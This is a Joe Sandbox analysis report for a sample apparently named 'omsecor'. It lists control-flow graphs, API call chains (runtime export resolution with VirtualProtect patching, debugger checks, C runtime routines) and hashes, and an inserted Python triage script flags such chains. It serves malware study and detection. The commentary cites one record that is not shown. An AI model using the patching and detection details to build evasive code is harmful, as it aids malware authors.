                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph
                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph
                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph
                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E
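The records above are worth turning into a repeatable check rather than reading by eye: the two functions at 00407A98 and 00407AB5 resolve an export with GetProcAddress and then call VirtualProtect twice over the same 0x78-byte range (first with 00000004, PAGE_READWRITE), which is the shape of in-place patching; the RegOpenKeyExW at 00406C91 opens 80000002 (HKLM) SOFTWARE\Microsoft\Internet Explorer; and the chain at 004020B3 pairs IsDebuggerPresent with SetUnhandledExceptionFilter, UnhandledExceptionFilter and TerminateProcess. One caveat a practitioner wants recorded: that last chain, with C0000409 (STATUS_STACK_BUFFER_OVERRUN) on the stack at the GetCurrentProcess call, is the MSVC CRT's buffer-security-check failure routine, and the report itself labels the C000000D (STATUS_INVALID_PARAMETER) variant at 00404121 as __invoke_watson, so neither is evidence of deliberate anti-debugging on its own. The Python below is an added example, not Joe Sandbox code and not part of this report. It parses bullet lines in the report's "APIs" format, decodes the hex constants the report prints raw (VirtualProtect protection, registry hive handle, NTSTATUS), and applies those three rules; the sample records are constructed here in the page's format, mirroring the calls and addresses shown above.

```python
"""Triage helper for Joe Sandbox-style "APIs" records (added example, not Joe Sandbox code).
Parses the bullet lines "• Api.MODULE(args), ref: ADDR" under each "APIs" block, decodes
constants the report prints as bare hex, and flags call chains worth a manual look."""
import re
from dataclasses import dataclass, field
from typing import Optional

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<call>[^\s(]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}
REG_HIVE = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}
NTSTATUS = {0xC0000409: "STATUS_STACK_BUFFER_OVERRUN", 0xC000000D: "STATUS_INVALID_PARAMETER"}

# Constructed sample in the report's format, mirroring records shown on this page.
SAMPLE = r"""
APIs
• GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
• VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
• VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
APIs
• IsDebuggerPresent.KERNEL32 ref: 004020B3
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
• UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
• GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
• TerminateProcess.KERNEL32(00000000), ref: 004020F6
APIs
• RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
  • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
"""

@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall: Optional[int] = None  # callee address when the line is inherited from a subcall

@dataclass
class Record:
    calls: list = field(default_factory=list)

    def apis(self):  # direct calls only; inherited subcall lines would double-count
        return {c.api for c in self.calls if c.subcall is None}

    def first(self, api):
        return next((c for c in self.calls if c.api == api), None)

def parse_records(text):
    """One Record per 'APIs' block; lines not in the bullet format are skipped."""
    records = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(Record())
            continue
        m = LINE_RE.match(line)
        if not m or not records:
            continue
        api, _, module = m.group("call").rpartition(".")
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        records[-1].calls.append(Call(api, module, args, int(m.group("ref"), 16), sub))
    return records

def _hex(arg):
    try:
        return int(arg, 16)
    except ValueError:  # "?" (unknown) or a string literal such as a registry path
        return None

def triage(record):
    """Findings for one record; an empty list means nothing matched."""
    apis, findings = record.apis(), []
    # 1. Resolve-then-patch: GetProcAddress/GetModuleHandleA plus VirtualProtect in one function.
    if "VirtualProtect" in apis and {"GetProcAddress", "GetModuleHandleA"} & apis:
        vp = record.first("VirtualProtect")
        size, prot = (_hex(vp.args[1]), _hex(vp.args[2])) if len(vp.args) > 2 else (None, None)
        findings.append("code/data patching: VirtualProtect(size=%s, %s) near %08X" % (
            hex(size) if size is not None else "?", PAGE_PROTECT.get(prot, "?"), vp.ref))
    # 2. IsDebuggerPresent beside UnhandledExceptionFilter and TerminateProcess with a known NTSTATUS
    #    is the MSVC CRT failure handler; the status is already on the stack at GetCurrentProcess,
    #    which is why the report prints it as that call's argument.
    if "IsDebuggerPresent" in apis:
        gcp = record.first("GetCurrentProcess")
        status = _hex(gcp.args[0]) if gcp and gcp.args else None
        if status in NTSTATUS and {"UnhandledExceptionFilter", "TerminateProcess"} <= apis:
            findings.append("CRT failure handler (%s); IsDebuggerPresent here is not anti-debug"
                            % NTSTATUS[status])
        else:
            findings.append("debugger check: IsDebuggerPresent at %08X"
                            % record.first("IsDebuggerPresent").ref)
    # 3. Registry reads: decode the hive handle so the key reads as a normal path.
    for c in record.calls:
        if c.api.startswith("RegOpenKeyEx") and c.subcall is None and len(c.args) >= 2:
            findings.append("registry read: %s\\%s" % (REG_HIVE.get(_hex(c.args[0]), c.args[0]), c.args[1]))
    return findings

def triage_text(text):
    return [triage(r) for r in parse_records(text)]

if __name__ == "__main__":
    for i, found in enumerate(triage_text(SAMPLE)):
        print("record %d: %s" % (i, found))
```

Run as-is it reports on the constructed SAMPLE; to run it over a saved copy of a report, pass the file's text to triage_text. Subcall lines are parsed but excluded from rule matching on purpose: the report repeats a callee's APIs under every caller, so counting them would flag the same CRT handler in every function that can reach it.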

                          Control-flow Graph
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

